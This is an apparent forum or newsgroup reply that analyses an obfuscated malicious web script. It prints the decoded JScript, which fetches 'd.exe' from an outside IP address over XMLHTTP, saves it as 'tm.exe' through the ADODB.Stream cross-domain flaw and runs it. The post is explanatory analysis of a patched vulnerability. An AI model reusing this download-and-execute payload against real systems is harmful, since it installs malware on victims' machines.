"Wong Yung" wrote:

> *Sigh* I couldn't get a nice simple evil guy could I?

Many of the malware writers today are funded by organized crime, and
the software is getting more sophisticated. It's not so much hackers
having fun anymore.

> BTW what is this other more obfusticated exploit that you found?

There are a couple of levels of encoded script which I won't go
through here, but eventually it boils down to this (some munging
again; [ ] replace < >, and ht_p replaces http) ...

[script language='jscript']
a=new ActiveXObject('Shell.Application');
var x = new ActiveXObject('Mic'+'ros'+'oft.X'+'MLHTTP');
x.Open('GET','ht_p://66.36.241.243/d.exe',0);
x.Send();
var s=new ActiveXObject('ADODB.Stream');
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile('../tm.exe',2);
a.ShellExecute('../tm.exe');
[/script]

So here is another method of downloading "d.exe" from the same IP
address as before, then using the ADODB.Stream cross-domain exploit
to save the file as "tm.exe" and run it in the context of the local
machine. MS patched this particular vulnerability some time ago.